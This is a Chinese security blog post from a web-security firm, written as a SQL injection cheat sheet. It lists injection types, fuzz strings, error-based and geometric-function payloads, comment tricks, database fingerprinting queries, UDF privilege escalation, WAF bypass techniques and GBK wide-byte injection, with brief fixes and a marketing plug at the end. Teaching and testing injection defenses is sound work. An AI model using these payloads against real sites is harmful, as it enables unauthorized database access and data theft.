ITPub博客

首页 > IT基础架构 > 应用安全 > 网站被攻击渗透测试出漏洞怎么办

网站被攻击渗透测试出漏洞怎么办

原创 应用安全 作者:网站安全 时间:2019-09-30 09:53:44 0 删除 编辑

国庆即将到来,前一期讲到获取网站信息判断所属环境以及各个端口的用处和弱口令密码利用方法,这期仍有很多客户找到我们Sine安全想要了解针对于SQL注入攻击的测试方法,这一期我们来讲解下注入的攻击分类和使用手法,让客户明白漏洞是如何产生的,会给网站安全带来怎样的影响!

3.1 SQL注入漏洞

3.1.1. 注入分类

SQL注入是一种代码注入技术,用于攻击数据驱动的应用程序。在应用程序中,如果没有做恰当的过滤,则可能使得恶意的SQL语句被插入输入字段中执行(例如将数据库内容转储给攻击者)。

3.1.1.1. 按技巧分类

根据使用的技巧,SQL注入类型可分为

  • 盲注
  • 布尔盲注:只能从应用返回中推断语句执行后的布尔值
  • 时间盲注:应用没有明确的回显,只能使用特定的时间函数来判断
  • 报错注入:应用会显示全部或者部分的报错信息
  • 堆叠注入:有的应用可以加入 ; 后一次执行多条语句
  • 其他

3.1.1.2. 按获取数据的方式分类

另外也可以根据获取数据的方式分为3类

  • inband
  • 利用Web应用来直接获取数据
  • 如报错注入
  • 都是通过站点的响应或者错误反馈来提取数据
  • inference
  • 通过Web的一些反映来推断数据
  • 如布尔盲注和堆叠注入
  • 也就是我们通俗的盲注,
  • 通过web应用的其他改变来推断数据
  • out of band(OOB)
  • 通过其他传输方式来获得数据,比如DNS解析协议和电子邮件

3.1.2. 注入检测

3.1.2.1. 常见的注入点

  • GET/POST/PUT/DELETE参数
  • X-Forwarded-For
  • 文件名

3.1.2.2. Fuzz注入点

  • ' / "
  • 1/1
  • 1/0
  • and 1=1
  • " and "1"="1
  • and 1=2
  • or 1=1
  • or 1=
  • ' and '1'='1
  • + - ^ * % /
  • << >> || | & &&
  • ~
  • !
  • @
  • 反引号执行

3.1.2.3. 测试用常量

  • @@version
  • @@servername
  • @@language
  • @@spid

3.1.2.4. 测试列数

例如 域名/index.asp?id=12+union+select+nulll,null-- ,不断增加 null 至不返回

3.1.2.5. 报错注入

  • select 1/0
  • select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a
  • extractvalue(1, concat(0x5c,(select user())))
  • updatexml(0x3a,concat(1,(select user())),1)
  • exp(~(SELECT * from(select user())a))
  • ST_LatFromGeoHash((select * from(select * from(select user())a)b))
  • GTID_SUBSET(version(), 1)

3.1.2.5.1. 基于geometric的报错注入

  • GeometryCollection((select * from (select * from(select user())a)b))
  • polygon((select * from(select * from(select user())a)b))
  • multipoint((select * from(select * from(select user())a)b))
  • multilinestring((select * from(select * from(select user())a)b))
  • LINESTRING((select * from(select * from(select user())a)b))
  • multipolygon((select * from(select * from(select user())a)b))

其中需要注意的是,基于exp函数的报错注入在MySQL 5.5.49后的版本已经不再生效,具体可以参考这个 commit 95825f 。

而以上列表中基于geometric的报错注入在这个 commit 5caea4 中被修复,在5.5.x较后的版本中同样不再生效。

3.1.2.6. 堆叠注入

  • ;select 1

3.1.2.7. 注释符

  • #
  • --+
  • /*xxx*/
  • /*!xxx*/
  • /*!50000xxx*/

3.1.2.8. 判断过滤规则

  • 是否有trunc
  • 是否过滤某个字符
  • 是否过滤关键字
  • slash和编码

3.1.2.9. 获取信息

  • 判断数据库类型
  • and exists (select * from msysobjects ) > 0 access数据库
  • and exists (select * from sysobjects ) > 0 SQLServer数据库
  • 判断数据库表
  • and exsits (select * from admin)
  • 版本、主机名、用户名、库名
  • 表和字段
  • 确定字段数(Order By Select Into)
  • 表名、列名

3.1.2.10. 测试权限

文件操作

  • 读敏感文件
  • 写shell
  • 带外通道
  • 网络请求

3.1.3. 权限提升

3.1.3.1. UDF提权

UDF(User Defined Function,用户自定义函数)是MySQL提供的一个功能,可以通过编写DLL扩展为MySQL添加新函数,扩充其功能。

当获得MySQL权限之后,即可通过这种方式上传自定义的扩展文件,从MySQL中执行系统命令。

3.1.4. 数据库检测

3.1.4.1. MySQL

  • sleep sleep(1)
  • benchmark BENCHMARK(5000000, MD5('test'))
  • 字符串连接
  • SELECT 'a' 'b'
  • SELECT CONCAT('some','string')
  • version
  • SELECT @@version
  • SELECT version()
  • 识别用函数
  • connection_id()
  • last_insert_id()
  • row_count()

3.1.4.2. Oracle

  • 字符串连接
  • 'a'||'oracle' --
  • SELECT CONCAT('some','string')
  • version
  • SELECT banner FROM v$version
  • SELECT banner FROM v$version WHERE rownum=1

3.1.4.3. SQLServer

  • WAITFOR WAITFOR DELAY '00:00:10';
  • SERVERNAME SELECT @@SERVERNAME
  • version SELECT @@version
  • 字符串连接
  • SELECT 'some'+'string'
  • 常量
  • @@pack_received
  • @@rowcount

3.1.4.4. PostgreSQL

  • sleep pg_sleep(1)

3.1.5. 绕过技巧

  • 编码绕过
  • 大小写
  • url编码
  • html编码
  • 十六进制编码
  • unicode编码
  • 注释
  • // -- -- + -- - # /**/ ;%00
  • 内联注释用的更多,它有一个特性 /!**/ 只有MySQL能识别
  • e.g. index.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3
  • 只过滤了一次时
  • union => ununionion
  • 相同功能替换
  • 函数替换
  • substring / mid / sub
  • ascii / hex / bin
  • benchmark / sleep
  • 变量替换
  • user() / @@user
  • 符号和关键字
  • and / &
  • or / |
  • HTTP参数
  • HTTP参数污染
  • id=1&id=2&id=3 根据容器不同会有不同的结果
  • HTTP分割注入
  • 缓冲区溢出
  • 一些C语言的WAF处理的字符串长度有限,超出某个长度后的payload可能不会被处理
  • 二次注入有长度限制时,通过多句执行的方法改掉数据库该字段的长度绕过

3.1.6. SQL注入小技巧

3.1.6.1. 宽字节注入

一般程序员用gbk编码做开发的时候,会用 set names 'gbk' 来设定,这句话等同于

set

character_set_connection = 'gbk',

character_set_result = 'gbk',

character_set_client = 'gbk';

漏洞发生的原因是执行了 set character_set_client = 'gbk'; 之后,mysql就会认为客户端传过来的数据是gbk编码的,从而使用gbk去解码,而mysql_real_escape是在解码前执行的。但是直接用 set names 'gbk' 的话real_escape是不知道设置的数据的编码的,就会加 %5c 。此时server拿到数据解码 就认为提交的字符+%5c是gbk的一个字符,这样就产生漏洞了。

解决的办法有三种,第一种是把client的charset设置为binary,就不会做一次解码的操作。第二种是是 mysql_set_charset('gbk') ,这里就会把编码的信息保存在和数据库的连接里面,就不会出现这个问题了。第三种就是用pdo。如果期间想要渗透测试自己的网站安全性,可以联系专业的网站安全公司来处理解决,国内推荐Sinesafe,绿盟,启明星辰等等的网站安全公司,还有一些其他的编码技巧,比如latin会弃掉无效的unicode,那么admin%32在代码里面不等于admin,在数据库比较会等于admin。


来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/31542418/viewspace-2658818/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论

注册时间:2018-06-15

  • 博文量
    62
  • 访问量
    65598